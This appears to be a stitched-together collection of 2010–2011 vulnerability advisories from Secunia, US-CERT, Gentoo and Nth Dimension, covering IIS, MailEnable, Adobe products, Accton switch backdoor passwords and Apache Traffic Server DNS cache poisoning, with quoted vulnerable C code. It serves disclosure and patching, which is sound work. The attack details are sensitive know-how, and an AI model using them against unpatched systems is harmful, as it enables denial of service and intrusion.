AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SUSE has issued an update for multiple packages, which fixes multiple vulnerabilities. For more information: SA32349 SA33495 SA35095 SA35379 SA35411 SA35449 SA35758 SA36269 SA36677 SA37273 SA37346 SA37769 SA38061 SA38545 SA38932 SA39029 SA39091 SA39384 SA39661 SA39937 SA40002 SA40072 SA40105 SA40112 SA40148 SA40196 SA40257 SA40664 SA40783 SA41014 SA41085 SA41242 SA41328 SA41390 SA41443 SA41535 SA41841 SA41888 SA41968 SA42151 SA42264 SA42290 SA42312 SA42443 SA42461 SA42658 SA42769 SA42886 SA42956 SA43053 SOLUTION: Apply updated packages via YaST Online Update or the SUSE FTP server. ORIGINAL ADVISORY: SUSE-SR:2011:002: http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability.". Microsoft IIS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to force the affected application to become unresponsive, denying service to legitimate users. This issue affects IIS 5.1, 6.0, 7.0, and 7.5. ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: Microsoft IIS Repeated Parameter Request Denial of Service SECUNIA ADVISORY ID: SA41399 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41399/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41399 RELEASE DATE: 2010-09-15 DISCUSS ADVISORY: http://secunia.com/advisories/41399/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41399/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41399 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Internet Information Services, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a stack overflow error in the script processing code when handling repeated parameter requests. This can be exploited to crash the service via specially crafted requests to hosted ASP scripts, which write parameters from the request in the response. SOLUTION: Apply patches. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Jinsik Shim. ORIGINAL ADVISORY: MS10-065 (KB2124261, KB2267960): http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA10-257A Microsoft Updates for Multiple Vulnerabilities Original release date: September 14, 2010 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Office Overview There are multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address these vulnerabilities. I. Description The Microsoft Security Bulletin Summary for September 2010 describes multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address the vulnerabilities. II. Impact A remote, unauthenticated attacker could execute arbitrary code or cause a vulnerable system or application to crash. III. Solution Apply updates Microsoft has provided updates for these vulnerabilities in the Microsoft Security Bulletin Summary for September 2010. That bulletin describes any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. In addition, administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS). IV. References * Microsoft Security Bulletin Summary for September 2010 - <http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx> * Microsoft Windows Server Update Services - <http://technet.microsoft.com/en-us/wsus/default.aspx> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA10-257A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA10-257A Feedback VU#447990" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2010 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History September 14, 2010: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBTI/u6T6pPKYJORa3AQKfgQgAsBDEHMH+Dq73qHFwsGnUIBWi7DkAV64s 0tz109GDGQRXL/MkXwWfaFfDc+h4ZUgjfVv93GBjK0NI78mYOWxSS7Pd3WhD6TaH YFcDcF4IW06Er4wEjgR+y5fTvF17k3Cix0GdsVzet/I2XMd4uCnIrHyLzLgZhf5s sWtv+kLaqCKUl8zsmcpmTcKUt+V2U3VWGeICIwuZXjB8FNHWuzYN1r/togFt0tcA 16gtGSCmdJy6Er+FyXxTJvWX4uJywBTDtIZZY/xyhGp2dBWUdOfY1k+7C5Dp/tCY Rq9tOY6caxHUYmitTtABaop83jTJFnS53lQJo4UizDNQoNbRSUIVFA== =dDpT -----END PGP SIGNATURE-----

Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka "Request Header Buffer Overflow Vulnerability.". Microsoft IIS is prone to a remote buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue affects IIS 7.5 on Windows 7 and Windows Server 2008 R2. ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: Microsoft IIS FastCGI Request Header Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA41375 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41375/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41375 RELEASE DATE: 2010-09-14 DISCUSS ADVISORY: http://secunia.com/advisories/41375/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41375/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41375 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Microsoft Internet Information Services, which can be exploited by malicious people to compromise a vulnerable system. Successful exploitation requires that FastCGI is enabled (disabled by default). SOLUTION: Apply patches. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Travis Raybold, Rubicon West. ORIGINAL ADVISORY: MS10-065 (KB2267960, KB2271195): http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA10-257A Microsoft Updates for Multiple Vulnerabilities Original release date: September 14, 2010 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Office Overview There are multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address these vulnerabilities. I. Description The Microsoft Security Bulletin Summary for September 2010 describes multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address the vulnerabilities. II. III. Solution Apply updates Microsoft has provided updates for these vulnerabilities in the Microsoft Security Bulletin Summary for September 2010. That bulletin describes any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. In addition, administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS). IV. References * Microsoft Security Bulletin Summary for September 2010 - <http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx> * Microsoft Windows Server Update Services - <http://technet.microsoft.com/en-us/wsus/default.aspx> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA10-257A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA10-257A Feedback VU#447990" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2010 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History September 14, 2010: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBTI/u6T6pPKYJORa3AQKfgQgAsBDEHMH+Dq73qHFwsGnUIBWi7DkAV64s 0tz109GDGQRXL/MkXwWfaFfDc+h4ZUgjfVv93GBjK0NI78mYOWxSS7Pd3WhD6TaH YFcDcF4IW06Er4wEjgR+y5fTvF17k3Cix0GdsVzet/I2XMd4uCnIrHyLzLgZhf5s sWtv+kLaqCKUl8zsmcpmTcKUt+V2U3VWGeICIwuZXjB8FNHWuzYN1r/togFt0tcA 16gtGSCmdJy6Er+FyXxTJvWX4uJywBTDtIZZY/xyhGp2dBWUdOfY1k+7C5Dp/tCY Rq9tOY6caxHUYmitTtABaop83jTJFnS53lQJo4UizDNQoNbRSUIVFA== =dDpT -----END PGP SIGNATURE-----

The SMTP service (MESMTPC.exe) in MailEnable 3.x and 4.25 does not properly perform a length check, which allows remote attackers to cause a denial of service (crash) via a long (1) email address in the MAIL FROM command, or (2) domain name in the RCPT TO command, which triggers an "unhandled invalid parameter error.". MailEnable is a commercial mail server. MailEnable has two security vulnerabilities that allow a malicious attacker to perform a denial of service attack. - Using the strcat_s() function to append predefined log message data to the buffer without a sufficient length check can result in an illegal parameter error that cannot be handled. - Using the strcpy_s() function to copy predefined log message data to the buffer without a sufficient length check can result in an illegal parameter error that cannot be handled. MailEnable is prone to multiple remote denial-of-service vulnerabilities. An attacker can exploit these issue to crash the affected application, denying service to legitimate users. MailEnable 4.25 Standard Edition, Professional Edition, and Enterprise Edition are vulnerable; other versions may also be affected. NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote ====================================================================== 3) Vendor's Description of Software "MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services." Product Link: http://www.mailenable.com/default.asp ====================================================================== 4) Description of Vulnerability Secunia Research has discovered two vulnerabilities in MailEnable, which can be exploited by malicious people to cause a DoS (Denial of Service). ====================================================================== 5) Solution Update to version 4.26 or apply hotfix ME-10044. ====================================================================== 6) Time Table 03/09/2010 - Requested security contact from the vendor. 04/09/2010 - Vendor response. 06/09/2010 - Vulnerability details provided to the vendor. 08/09/2010 - Vendor provides fixed version. 10/09/2010 - Secunia Research confirms fixes. 13/09/2010 - Vendor releases fixed version. 13/09/2010 - Public disclosure ====================================================================== 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-2580 for the vulnerabilities. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-112/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== . ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: MailEnable SMTP Service Two Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA41175 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41175/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41175 RELEASE DATE: 2010-09-13 DISCUSS ADVISORY: http://secunia.com/advisories/41175/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41175/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41175 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Secunia Research has discovered two vulnerabilities in MailEnable, which can be exploited by malicious people to cause a DoS (Denial of Service). ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-112/ MailEnable: http://www.mailenable.com/Standard-ReleaseNotes.txt http://www.mailenable.com/Professional-ReleaseNotes.txt http://www.mailenable.com/Enterprise-ReleaseNotes.txt http://www.mailenable.com/hotfix/default.asp OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

YOPS (Your Own Personal [WEB] Server) is a Linux platform HTTP server written in C. The http_parse_request_header function of the YOPS server does not use the boundary check of the buffer received from the HTTP command ((HEAD/GET/POST) as a parameter of the logger variable in the swebs_record_log function. The long request parameter can trigger a buffer overflow. Causes arbitrary code to be executed.

Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android; authplay.dll in Adobe Reader and Acrobat 9.x before 9.4; and authplay.dll in Adobe Reader and Acrobat 8.x before 8.2.5 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in September 2010. Adobe Flash Contains a vulnerability. Attack activity using this vulnerability has been confirmed.Crafted Flash By browsing a document with embedded content, arbitrary code may be executed. Failed attacks may cause denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201101-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 21, 2011 Bugs: #336508, #343091 ID: 201101-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might result in the execution of arbitrary code. Background ========== Adobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.1 >= 9.4.1 Description =========== Multiple vulnerabilities were discovered in Adobe Reader. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.1" References ========== [ 1 ] APSB10-21 http://www.adobe.com/support/security/bulletins/apsb10-21.html [ 2 ] APSB10-28 http://www.adobe.com/support/security/bulletins/apsb10-28.html [ 3 ] CVE-2010-2883 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883 [ 4 ] CVE-2010-2884 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2884 [ 5 ] CVE-2010-2887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2887 [ 6 ] CVE-2010-2889 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2889 [ 7 ] CVE-2010-2890 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2890 [ 8 ] CVE-2010-3619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3619 [ 9 ] CVE-2010-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3620 [ 10 ] CVE-2010-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3621 [ 11 ] CVE-2010-3622 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3622 [ 12 ] CVE-2010-3625 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3625 [ 13 ] CVE-2010-3626 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3626 [ 14 ] CVE-2010-3627 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3627 [ 15 ] CVE-2010-3628 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3628 [ 16 ] CVE-2010-3629 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3629 [ 17 ] CVE-2010-3630 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3630 [ 18 ] CVE-2010-3632 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3632 [ 19 ] CVE-2010-3654 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654 [ 20 ] CVE-2010-3656 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3656 [ 21 ] CVE-2010-3657 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3657 [ 22 ] CVE-2010-3658 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3658 [ 23 ] CVE-2010-4091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4091 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201101-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Switches developed by Accton include 3Com, Dell, SMC, Foundry and EdgeCore, which have security vulnerabilities that allow malicious users to control devices. The problem is that the switch has a built-in \"__super\" user, and its password is generated based on the MAC address. The MAC address of the switch is obtained through ARP or SNMP. The management interface can be controlled through TELNET, SSH and HTTP.

Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response. DNS May be disguised. Traffic Server is an open source proxy server and web cache server developed by the Apache Software Foundation. The application implementation has security issues that allow malicious users to perform DNS cache poison attacks. Apache Traffic Server is prone to a remote DNS cache-poisoning vulnerability. An attacker can exploit this issue to divert data from a legitimate site to an attacker-specified site. Successful exploits will allow the attacker to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks. ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: Apache Traffic Server DNS Cache Poisoning Vulnerability SECUNIA ADVISORY ID: SA41356 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41356/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41356 RELEASE DATE: 2010-09-09 DISCUSS ADVISORY: http://secunia.com/advisories/41356/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41356/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41356 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Tim Brown has reported a vulnerability in Apache Traffic Server, which can be exploited by malicious people to poison the DNS cache. SOLUTION: Update to version 2.0.1. PROVIDED AND/OR DISCOVERED BY: Tim Brown, Nth Dimension. ORIGINAL ADVISORY: Apache: https://issues.apache.org/jira/browse/TS-425 Tim Brown: http://www.nth-dimension.org.uk/pub/NDSA20100830.txt.asc OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory (NDSA20100830) Date: 30th August 2010 Author: Tim Brown <mailto:timb@nth-dimension.org.uk> URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> Product: Traffic Server 2.1.1, 2.0.0 <http://trafficserver.apache.org/> Vendor: Apache Software Foundation <http://www.apache.org/> / Yahoo! Inc Risk: Medium Summary This advisory comes in 3 related parts: 1) Traffic Server uses a static (per DNS server) source port for making outgoing DNS queries. 2) Traffic Server uses a sequential transaction ID when constructing asynchronous DNS queries. Moreover the algorithm used to select the intitial transation ID is not sufficiently random. These vulnerabilities might significantly increase the chances of Traffic Server's internal DNS cache being poisoned. After discussions with the vendor, CVE-2010-2952 was assigned to this vulnerability. The port is chosen at runtime using the DNSConnection::connect() method from iocore/dns/DNSConnection.cc: struct sockaddr_in bind_sa; memset(&sa, 0, sizeof(bind_sa)); bind_sa.sin_family = AF_INET; bind_sa.sin_addr.s_addr = INADDR_ANY; int p = time(NULL) + offset; p = (p % (LAST_RANDOM_PORT - FIRST_RANDOM_PORT)) + FIRST_RANDOM_PORT; bind_sa.sin_port = htons(p); Debug("dns", "random port = %d\n", p); if ((res = socketManager.ink_bind(fd, (struct sockaddr *) &bind_sa, sizeof(bind_sa), Proto)) < 0) { offset += 101; continue; } Note that since FIRST_RANDOM_PORT is set to 16000, LAST_RANDOM_PORT is defined as 32000 and since the underlying algorith is predictable, the source port may be guessed. The base number is set at runtime using the DNSProcessor::dns_init() method from iocore/dns/DNS.cc: if (cval > 0) { dns_sequence_number = (unsigned int) (cval + DNS_SEQUENCE_NUMBER_RESTART_OFFSET); Debug("dns", "initial dns_sequence_number (cval) = %d\n", (u_short) dns_sequence_number); } else { // select a sequence number at random dns_sequence_number = (unsigned int) (ink_get_hrtime() / HRTIME_MSECOND); Debug("dns", "initial dns_sequence_number (time) = %d\n", (u_short) dns_sequence_number); } and then incremented on each subsequent request as seen in the write_dns_event() function: ++dns_sequence_number; ... u_short i = (u_short) dns_sequence_number; ((HEADER *) (buffer))->id = htons(i); 3) When processing responses, Traffic Server walks a linked list which holds details of each attempted request and compares the incoming ID with its list to ascertain which request a given response relates. This can be seen in the dns_process() function from iocore/dns/DNS.cc: DNSEntry *e = get_dns(handler, (u_short) ntohs(h->id)); ... inline static DNSEntry * get_dns(DNSHandler * h, u_short id) { for (DNSEntry * e = h->entries.head; e; e = (DNSEntry *) e->link.next) { if (e->once_written_flag) for (int j = 0; j < MAX_DNS_RETRIES; j++) if (e->id[j] == id) return e; else if (e->id[j] < 0) goto Lnext; Lnext:; } return NULL; } Solutions Nth Dimension recommends that the vendor supplied patches should be applied. History On 20th August 2010, Nth Dimension contacted both Yahoo! Inc and the Apache Software Foundation's security teams to report the described vulnerabilities affecting Traffic Server. Yahoo's team responded immediately to confirm that that the report had been recieved and forwarded to the relevant people. Following on from this, Nth Dimension and the Traffic Server developers opened a dialogue and the issue and potential remediations were discussed at length. After offering feedback on Leif Hedstrom's original analysis, Steve Jiang went away and produced a patch based on 